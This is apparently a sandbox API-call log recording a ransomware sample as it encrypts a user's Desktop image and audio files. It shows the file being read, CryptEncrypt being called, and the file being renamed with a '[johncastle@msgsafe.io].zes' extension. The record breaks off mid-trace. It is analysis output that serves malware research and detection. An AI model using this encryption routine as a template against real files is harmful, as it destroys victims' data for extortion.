(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\mGYbl5LMqWWKr.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\mgybl5lmqwwkr.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0134.401] GetProcessHeap () returned 0x520000 [0134.401] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.401] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.401] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff7a0 | out: lpNewFilePointer=0x0) returned 1 [0134.401] WriteFile (in: hFile=0x134, lpBuffer=0x23ff7b0*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff7b0*, lpNumberOfBytesWritten=0x23ff780*=0xd, lpOverlapped=0x0) returned 1 [0134.401] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff784 | out: phKey=0x23ff784*=0x546448) returned 1 [0134.401] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.401] GetProcessHeap () returned 0x520000 [0134.401] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.401] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ff768*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ff768*=0x40) returned 1 [0134.402] CryptDestroyKey (hKey=0x546448) returned 1 [0134.402] WriteFile (in: hFile=0x134, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ff780*=0x40, lpOverlapped=0x0) returned 1 [0134.402] WriteFile (in: hFile=0x134, lpBuffer=0x23ff788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff788*, lpNumberOfBytesWritten=0x23ff780*=0x4, lpOverlapped=0x0) returned 1 [0134.402] WriteFile (in: hFile=0x134, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ff780*=0x10, lpOverlapped=0x0) returned 1 [0134.402] WriteFile (in: hFile=0x134, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ff780*=0x80, lpOverlapped=0x0) returned 1 [0134.402] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff7a8 | out: lpNewFilePointer=0x0) returned 1 [0134.402] WriteFile (in: hFile=0x134, lpBuffer=0x23ff798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff798*, lpNumberOfBytesWritten=0x23ff780*=0x8, lpOverlapped=0x0) returned 1 [0134.402] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff784 | out: phKey=0x23ff784*=0x546448) returned 1 [0134.402] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.402] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.402] ReadFile (in: hFile=0x134, lpBuffer=0x2140020, nNumberOfBytesToRead=0x17dc3, lpNumberOfBytesRead=0x23ff78c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ff78c*=0x17dc3, lpOverlapped=0x0) returned 1 [0134.403] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ff768*=0x17dd0, dwBufLen=0x17dd0 | out: pbData=0x2140020*, pdwDataLen=0x23ff768*=0x17dd0) returned 1 [0134.404] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.404] WriteFile (in: hFile=0x134, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x17dd0, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ff780*=0x17dd0, lpOverlapped=0x0) returned 1 [0134.404] CryptDestroyKey (hKey=0x546448) returned 1 [0134.404] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x17ea4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.404] SetEndOfFile (hFile=0x134) returned 1 [0134.407] GetProcessHeap () returned 0x520000 [0134.407] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.407] GetProcessHeap () returned 0x520000 [0134.407] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.407] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\mGYbl5LMqWWKr.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\mgybl5lmqwwkr.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\mGYbl5LMqWWKr.gif.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\mgybl5lmqwwkr.gif.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.413] CloseHandle (hObject=0x134) returned 1 [0134.414] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.414] FindNextFileW (in: hFindFile=0x53a5f8, lpFindFileData=0x23ff810 | out: lpFindFileData=0x23ff810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74680640, ftCreationTime.dwHighDateTime=0x1d5e1f1, ftLastAccessTime.dwLowDateTime=0x4e982130, ftLastAccessTime.dwHighDateTime=0x1d5dabb, ftLastWriteTime.dwLowDateTime=0x4e982130, ftLastWriteTime.dwHighDateTime=0x1d5dabb, nFileSizeHigh=0x0, nFileSizeLow=0x14ced, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="mnJKsprR.wav", cAlternateFileName="")) returned 1 [0134.414] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\mnJKsprR.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\mnjksprr.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0134.414] GetProcessHeap () returned 0x520000 [0134.414] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.414] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.414] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff7a0 | out: lpNewFilePointer=0x0) returned 1 [0134.414] WriteFile (in: hFile=0x134, lpBuffer=0x23ff7b0*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff7b0*, lpNumberOfBytesWritten=0x23ff780*=0x3, lpOverlapped=0x0) returned 1 [0134.414] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff784 | out: phKey=0x23ff784*=0x546448) returned 1 [0134.414] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.415] GetProcessHeap () returned 0x520000 [0134.415] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.415] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ff768*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ff768*=0x40) returned 1 [0134.415] CryptDestroyKey (hKey=0x546448) returned 1 [0134.415] WriteFile (in: hFile=0x134, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ff780*=0x40, lpOverlapped=0x0) returned 1 [0134.415] WriteFile (in: hFile=0x134, lpBuffer=0x23ff788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff788*, lpNumberOfBytesWritten=0x23ff780*=0x4, lpOverlapped=0x0) returned 1 [0134.415] WriteFile (in: hFile=0x134, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ff780*=0x10, lpOverlapped=0x0) returned 1 [0134.415] WriteFile (in: hFile=0x134, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ff780*=0x80, lpOverlapped=0x0) returned 1 [0134.415] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff7a8 | out: lpNewFilePointer=0x0) returned 1 [0134.415] WriteFile (in: hFile=0x134, lpBuffer=0x23ff798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff798*, lpNumberOfBytesWritten=0x23ff780*=0x8, lpOverlapped=0x0) returned 1 [0134.415] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff784 | out: phKey=0x23ff784*=0x546448) returned 1 [0134.415] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.415] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.415] ReadFile (in: hFile=0x134, lpBuffer=0x2140020, nNumberOfBytesToRead=0x14ced, lpNumberOfBytesRead=0x23ff78c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ff78c*=0x14ced, lpOverlapped=0x0) returned 1 [0134.416] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ff768*=0x14cf0, dwBufLen=0x14cf0 | out: pbData=0x2140020*, pdwDataLen=0x23ff768*=0x14cf0) returned 1 [0134.417] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.417] WriteFile (in: hFile=0x134, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x14cf0, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ff780*=0x14cf0, lpOverlapped=0x0) returned 1 [0134.417] CryptDestroyKey (hKey=0x546448) returned 1 [0134.417] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x14dc4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.417] SetEndOfFile (hFile=0x134) returned 1 [0134.420] GetProcessHeap () returned 0x520000 [0134.420] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.420] GetProcessHeap () returned 0x520000 [0134.420] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.420] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\mnJKsprR.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\mnjksprr.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\mnJKsprR.wav.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\mnjksprr.wav.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.421] CloseHandle (hObject=0x134) returned 1 [0134.421] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.421] FindNextFileW (in: hFindFile=0x53a5f8, lpFindFileData=0x23ff810 | out: lpFindFileData=0x23ff810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cb2cc90, ftCreationTime.dwHighDateTime=0x1d5dac6, ftLastAccessTime.dwLowDateTime=0x5d57d390, ftLastAccessTime.dwHighDateTime=0x1d5e557, ftLastWriteTime.dwLowDateTime=0x5d57d390, ftLastWriteTime.dwHighDateTime=0x1d5e557, nFileSizeHigh=0x0, nFileSizeLow=0x61a5, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="NglnlXvJLQ haes0xIg.gif", cAlternateFileName="NGLNLX~1.GIF")) returned 1 [0134.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\NglnlXvJLQ haes0xIg.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\nglnlxvjlq haes0xig.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0134.422] GetProcessHeap () returned 0x520000 [0134.422] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.422] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.422] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff7a0 | out: lpNewFilePointer=0x0) returned 1 [0134.422] WriteFile (in: hFile=0x134, lpBuffer=0x23ff7b0*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff7b0*, lpNumberOfBytesWritten=0x23ff780*=0xb, lpOverlapped=0x0) returned 1 [0134.423] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff784 | out: phKey=0x23ff784*=0x546448) returned 1 [0134.423] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.423] GetProcessHeap () returned 0x520000 [0134.423] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.423] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ff768*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ff768*=0x50) returned 1 [0134.423] CryptDestroyKey (hKey=0x546448) returned 1 [0134.423] WriteFile (in: hFile=0x134, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ff780*=0x50, lpOverlapped=0x0) returned 1 [0134.423] WriteFile (in: hFile=0x134, lpBuffer=0x23ff788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff788*, lpNumberOfBytesWritten=0x23ff780*=0x4, lpOverlapped=0x0) returned 1 [0134.423] WriteFile (in: hFile=0x134, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ff780*=0x10, lpOverlapped=0x0) returned 1 [0134.424] WriteFile (in: hFile=0x134, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ff780*=0x80, lpOverlapped=0x0) returned 1 [0134.424] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff7a8 | out: lpNewFilePointer=0x0) returned 1 [0134.424] WriteFile (in: hFile=0x134, lpBuffer=0x23ff798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff798*, lpNumberOfBytesWritten=0x23ff780*=0x8, lpOverlapped=0x0) returned 1 [0134.424] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff784 | out: phKey=0x23ff784*=0x546448) returned 1 [0134.424] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.424] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.424] ReadFile (in: hFile=0x134, lpBuffer=0x2140020, nNumberOfBytesToRead=0x61a5, lpNumberOfBytesRead=0x23ff78c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ff78c*=0x61a5, lpOverlapped=0x0) returned 1 [0134.424] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ff768*=0x61b0, dwBufLen=0x61b0 | out: pbData=0x2140020*, pdwDataLen=0x23ff768*=0x61b0) returned 1 [0134.425] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.425] WriteFile (in: hFile=0x134, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x61b0, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ff780*=0x61b0, lpOverlapped=0x0) returned 1 [0134.425] CryptDestroyKey (hKey=0x546448) returned 1 [0134.425] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x6294, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.425] SetEndOfFile (hFile=0x134) returned 1 [0134.428] GetProcessHeap () returned 0x520000 [0134.428] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.428] GetProcessHeap () returned 0x520000 [0134.428] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.428] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\NglnlXvJLQ haes0xIg.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\nglnlxvjlq haes0xig.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\NglnlXvJLQ haes0xIg.gif.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\nglnlxvjlq haes0xig.gif.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.431] CloseHandle (hObject=0x134) returned 1 [0134.431] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.431] FindNextFileW (in: hFindFile=0x53a5f8, lpFindFileData=0x23ff810 | out: lpFindFileData=0x23ff810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x758d1530, ftCreationTime.dwHighDateTime=0x1d5da65, ftLastAccessTime.dwLowDateTime=0x4b4a8380, ftLastAccessTime.dwHighDateTime=0x1d5de42, ftLastWriteTime.dwLowDateTime=0x4b4a8380, ftLastWriteTime.dwHighDateTime=0x1d5de42, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="ohRy5R3Zh", cAlternateFileName="OHRY5R~1")) returned 1 [0134.431] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.431] GetProcessHeap () returned 0x520000 [0134.431] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xb4) returned 0x5462f0 [0134.432] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\*.*", lpFindFileData=0x23ff588 | out: lpFindFileData=0x23ff588*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x758d1530, ftCreationTime.dwHighDateTime=0x1d5da65, ftLastAccessTime.dwLowDateTime=0x4b4a8380, ftLastAccessTime.dwHighDateTime=0x1d5de42, ftLastWriteTime.dwLowDateTime=0x4b4a8380, ftLastWriteTime.dwHighDateTime=0x1d5de42, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName=".", cAlternateFileName="")) returned 0x546448 [0134.432] GetProcessHeap () returned 0x520000 [0134.432] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5462f0 | out: hHeap=0x520000) returned 1 [0134.432] FindNextFileW (in: hFindFile=0x546448, lpFindFileData=0x23ff588 | out: lpFindFileData=0x23ff588*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x758d1530, ftCreationTime.dwHighDateTime=0x1d5da65, ftLastAccessTime.dwLowDateTime=0x4b4a8380, ftLastAccessTime.dwHighDateTime=0x1d5de42, ftLastWriteTime.dwLowDateTime=0x4b4a8380, ftLastWriteTime.dwHighDateTime=0x1d5de42, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="..", cAlternateFileName="")) returned 1 [0134.432] FindNextFileW (in: hFindFile=0x546448, lpFindFileData=0x23ff588 | out: lpFindFileData=0x23ff588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c042b00, ftCreationTime.dwHighDateTime=0x1d5d991, ftLastAccessTime.dwLowDateTime=0xb313aa90, ftLastAccessTime.dwHighDateTime=0x1d5d8ad, ftLastWriteTime.dwLowDateTime=0xb313aa90, ftLastWriteTime.dwHighDateTime=0x1d5d8ad, nFileSizeHigh=0x0, nFileSizeLow=0x11394, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="C OQSp3lrPEA6lKyBv.bmp", cAlternateFileName="COQSP3~1.BMP")) returned 1 [0134.432] GetProcessHeap () returned 0x520000 [0134.432] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2b6) returned 0x56ac90 [0134.432] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\C OQSp3lrPEA6lKyBv.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ohry5r3zh\\c oqsp3lrpea6lkybv.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0134.435] GetProcessHeap () returned 0x520000 [0134.435] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.435] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.435] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff518 | out: lpNewFilePointer=0x0) returned 1 [0134.435] WriteFile (in: hFile=0x130, lpBuffer=0x23ff528*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x23ff528*, lpNumberOfBytesWritten=0x23ff4f8*=0xc, lpOverlapped=0x0) returned 1 [0134.436] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff4fc | out: phKey=0x23ff4fc*=0x546488) returned 1 [0134.436] CryptSetKeyParam (hKey=0x546488, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.436] GetProcessHeap () returned 0x520000 [0134.436] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.436] CryptEncrypt (in: hKey=0x546488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ff4e0*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ff4e0*=0x50) returned 1 [0134.436] CryptDestroyKey (hKey=0x546488) returned 1 [0134.436] WriteFile (in: hFile=0x130, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ff4f8*=0x50, lpOverlapped=0x0) returned 1 [0134.436] WriteFile (in: hFile=0x130, lpBuffer=0x23ff500*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x23ff500*, lpNumberOfBytesWritten=0x23ff4f8*=0x4, lpOverlapped=0x0) returned 1 [0134.436] WriteFile (in: hFile=0x130, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ff4f8*=0x10, lpOverlapped=0x0) returned 1 [0134.437] WriteFile (in: hFile=0x130, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ff4f8*=0x80, lpOverlapped=0x0) returned 1 [0134.437] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff520 | out: lpNewFilePointer=0x0) returned 1 [0134.437] WriteFile (in: hFile=0x130, lpBuffer=0x23ff510*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x23ff510*, lpNumberOfBytesWritten=0x23ff4f8*=0x8, lpOverlapped=0x0) returned 1 [0134.437] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff4fc | out: phKey=0x23ff4fc*=0x546488) returned 1 [0134.437] CryptSetKeyParam (hKey=0x546488, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.437] 